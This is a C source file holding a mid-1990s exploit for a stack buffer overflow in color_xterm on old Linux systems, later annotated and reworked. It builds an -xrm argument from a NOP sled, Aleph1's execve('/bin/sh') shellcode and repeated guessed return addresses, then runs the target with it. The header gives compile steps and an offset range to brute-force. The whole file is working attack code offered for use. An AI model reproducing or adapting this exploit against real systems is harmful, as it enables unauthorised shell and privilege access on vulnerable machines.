/* Larry W. Cashdollar color_xterm exploit for old linux boxen. 
  ~ 1996 - 1997  lwc@vapid.dhs.org 
   $ gcc exp-col.c -o exp-col 
   $ ./exp-col <offset>
 
   Try offsets from -1000 to 0; the guessed return address is get_sp() + offset
   and is printed at run time, so keep a note of which one lands.
   Worked on:
   ? Linux 2.0.32 #9 Fri Dec 5 14:42:34 EST 1997 i686
   Slackware 3.0 Linux 1.2.13 #15 Sat Dec 4 19:01:23 EST 1999 i486
*/


#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


#define NOP 0x90
#define LEN 1048
/*#define RET 0xbffff5b4 slackware 3.2?*/

/* Aleph1's execve("/bin/sh") shellcode (Phrack 49, "Smashing The Stack").
 * jmp/call trick: \xeb\x1f jumps forward to the \xe8 call, whose pushed
 * return address is the trailing "/bin/sh"; pop %esi (\x5e) recovers it.
 * argv[] and the NUL terminator are written in place after the string,
 * then int 0x80 with %al = 0x0b (execve); if that returns, %eax = 1 (exit).
 * No zero bytes, so it survives being passed as a C string. */
char shellcode[]= /*Aleph1's shell code. see phrack article*/
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";


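/*
 * Return the current stack pointer. Used as the base of the return-address
 * guess: the target runs with a similar environment, so its stack lives at
 * roughly the same addresses as ours.
 *
 * The original wrote %esp into %eax with a basic asm and fell off the end of
 * the function, relying on the caller reading %eax; that is undefined
 * behaviour in C and breaks under optimisation. Extended asm with an output
 * operand makes the value explicit. On non-x86 hosts (where this exploit is
 * meaningless anyway) the address of a local is used as an approximation.
 */
unsigned long get_sp(void) {
	unsigned long sp;
#if defined(__x86_64__)
	__asm__("movq %%rsp,%0" : "=r"(sp));
#elif defined(__i386__)
	__asm__("movl %%esp,%0" : "=r"(sp));
#else
	/* Portability fallback: close to the stack pointer, not equal to it. */
	volatile char probe = 0;
	sp = (unsigned long)&probe;
#endif
	return sp;
}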


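/*
 * Build the -xrm resource string that overflows color_xterm's buffer and
 * exec the target with it.
 *
 * Layout (see diagram at the end of the file): 250 NOPs, the shellcode,
 * then the buffer is padded with copies of the guessed return address
 * (get_sp() + offset) so that whichever word the saved EIP lands on points
 * back into the sled.
 *
 * argv[1]: decimal offset added to our own stack pointer. Negative values
 *          walk the guess down the stack (the header suggests -1000..0).
 * Returns 1 on bad usage or if execl fails; does not return on success.
 *
 * Fixes over the original: argv[1] was dereferenced without checking argc;
 * the fill loop started at strlen() of an uninitialised buffer (UB) instead
 * of 0; the buffer was handed to execl with no NUL terminator, so the argv
 * string ran on into whatever followed it on our stack; the return address
 * was stored through an unaligned (long *) cast and sized by the host's
 * long, not the 32-bit target's; "%x" was used for an unsigned long; and
 * execl's terminator was a plain 0 rather than a null pointer.
 */
int main(int argc, char *argv[]) {
	char buffer[LEN];
	uint32_t ret;            /* target is i386: 4-byte return address */
	unsigned long addr;
	long offset;
	char *end;
	size_t i;
	enum { NOP_SLED = 250 }; /* bytes of NOPs in front of the shellcode */

	printf("Old Color_xterm exploit 1996-97 linux boxen \n");
	printf("Larry W. Cashdollar  lwc@vapid.dhs.org      \n");

	if (argc != 2) {
		fprintf(stderr, "usage: %s <offset>\n", argv[0]);
		return 1;
	}

	/* strtol instead of atoi so junk such as "abc" or an overflow is
	 * rejected rather than silently turning into offset 0. */
	errno = 0;
	offset = strtol(argv[1], &end, 10);
	if (end == argv[1] || *end != '\0' || errno == ERANGE) {
		fprintf(stderr, "bad offset: %s\n", argv[1]);
		return 1;
	}

	addr = get_sp();
	ret = (uint32_t)(addr + offset);

	/* The payload travels as an argv string and stops at the first NUL, so a
	 * return address with a zero byte would truncate it before it reached
	 * the target. Warn; the caller may still want to try a nearby offset. */
	for (i = 0; i < sizeof ret; i++) {
		if (((ret >> (8 * i)) & 0xff) == 0) {
			fprintf(stderr,
				"warning: address 0x%lx contains a NUL byte; payload will be truncated\n",
				addr + offset);
			break;
		}
	}

	/* Start from an all-NOP buffer so no byte is ever left uninitialised,
	 * then tile the return address over it. memcpy handles the alignment
	 * and writes exactly 4 bytes on any host ABI. The last byte is kept for
	 * the terminator. */
	memset(buffer, NOP, LEN);
	for (i = 0; i + sizeof ret <= LEN - 1; i += sizeof ret) {
		memcpy(buffer + i, &ret, sizeof ret);
	}
	buffer[LEN - 1] = '\0';

	/* NOP sled first, shellcode right after it; 250 + 46 is a multiple of 4,
	 * so the return-address words that follow stay aligned. */
	if (NOP_SLED + strlen(shellcode) >= LEN - 1) {
		fprintf(stderr, "shellcode does not fit in the buffer\n");
		return 1;
	}
	memset(buffer, NOP, NOP_SLED);
	memcpy(buffer + NOP_SLED, shellcode, strlen(shellcode));

	printf("Offset -> %ld\n", offset);
	printf("Using Address 0x%lx\n", addr + offset);

	/* Exec the target with our payload as the -xrm resource string. */
	execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buffer, (char *)0);

	/* execl only returns on failure. */
	perror("execl");
	return 1;
}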

/*N = NOP S = Shell code R = Return address. */
/*[NNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR]*/
/*                    ^---buffer+i   ^---buffer+i+strlen(shellcode)*/

